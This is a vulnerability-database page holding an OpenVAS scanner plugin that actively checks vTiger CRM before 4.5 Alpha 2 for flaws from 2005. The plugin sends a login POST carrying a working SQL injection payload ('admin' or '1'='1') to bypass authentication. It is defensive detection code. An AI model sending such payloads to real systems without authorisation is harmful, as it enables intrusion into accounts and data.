Lucene search
+L

Vtiger < 4.5 Alpha 2 Multiple Vulnerabilities - Active Check

🗓️ 26 Mar 2006 00:00:00Reported by Copyright (C) 2005 David MaciejakType 
openvas
 openvas
🔗 plugins.openvas.org👁 23 Views

vTiger < 4.5 Alpha 2 Multiple Vulnerabilities. Arbitrary code execution, directory traversal, SQL injection, and cross-site scripting vulnerabilities

Related
Refs
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2005-3818
26 Nov 200502:00
cve
cve
CVE
CVE-2005-3819
26 Nov 200502:00
cve
cve
CVE
CVE-2005-3820
26 Nov 200502:00
cve
cve
CVE
CVE-2005-3821
26 Nov 200502:00
cve
cve
CVE
CVE-2005-3822
26 Nov 200502:00
cve
cve
CVE
CVE-2005-3823
26 Nov 200502:00
cve
cve
CVE
CVE-2005-3824
26 Nov 200502:00
cve
cvelist
Cvelist
CVE-2005-3818
26 Nov 200502:00
cvelist
cvelist
Cvelist
CVE-2005-3819
26 Nov 200502:00
cvelist
cvelist
Cvelist
CVE-2005-3820
26 Nov 200502:00
cvelist
Rows per page
# SPDX-FileCopyrightText: 2005 David Maciejak
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:vtiger:vtiger_crm";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.20317");
  script_version("2026-05-07T06:32:13+0000");
  script_tag(name:"last_modification", value:"2026-05-07 06:32:13 +0000 (Thu, 07 May 2026)");
  script_tag(name:"creation_date", value:"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_cve_id("CVE-2005-3818", "CVE-2005-3819", "CVE-2005-3820", "CVE-2005-3821",
                "CVE-2005-3822", "CVE-2005-3823", "CVE-2005-3824");

  script_tag(name:"qod_type", value:"remote_vul");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Vtiger < 4.5 Alpha 2 Multiple Vulnerabilities - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2005 David Maciejak");
  script_family("Web application abuses");
  script_dependencies("gb_vtiger_crm_http_detect.nasl");
  script_mandatory_keys("vtiger/http/detected");
  script_require_ports("Services/www", 80);

  script_tag(name:"summary", value:"Vtiger is prone to arbitrary code execution, directory
  traversal, SQL injection (SQLi) (allowing authentication bypass) and cross-site scripting (XSS)
  vulnerabilities.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP POST request and checks the response.");

  script_tag(name:"solution", value:"Update to version 4.5 alpha 2 or later.");

  script_xref(name:"URL", value:"http://www.hardened-php.net/advisory_232005.105.html");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/15562");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/15569");
  script_xref(name:"URL", value:"http://www.sec-consult.com/231.html");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!port = get_app_port(cpe: CPE, service: "www"))
  exit(0);

if (!dir = get_app_location(cpe: CPE, port: port))
  exit(0);

if (dir == "/")
  dir = "";

host = http_host_name(port: port);
filename = dir +  "/index.php";
variables = "module=Users&action=Authenticate&return_module=Users&return_action=Login&user_name=admin%27+or+%271%27%3D%271&user_password=test&login_theme=blue&login_language=en_us&Login=++Login++";

req = string("POST ", filename, " HTTP/1.0\r\n",
             "Referer: http://", host, filename, "\r\n",
             "Host: ", host, "\r\n",
             "Content-Type: application/x-www-form-urlencoded\r\n",
             "Content-Length: ", strlen(variables),
             "\r\n\r\n",
             variables);
result = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);

if (# Link to My Account
    "?module=Users&action=DetailView&record=" >< result ||
    "New Contact" >< result) {
  report = "It was possible to bypass authentication via an SQLi." + '\n\nResult:\n\n' + chomp(result);
  security_message(port: port, data: report);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation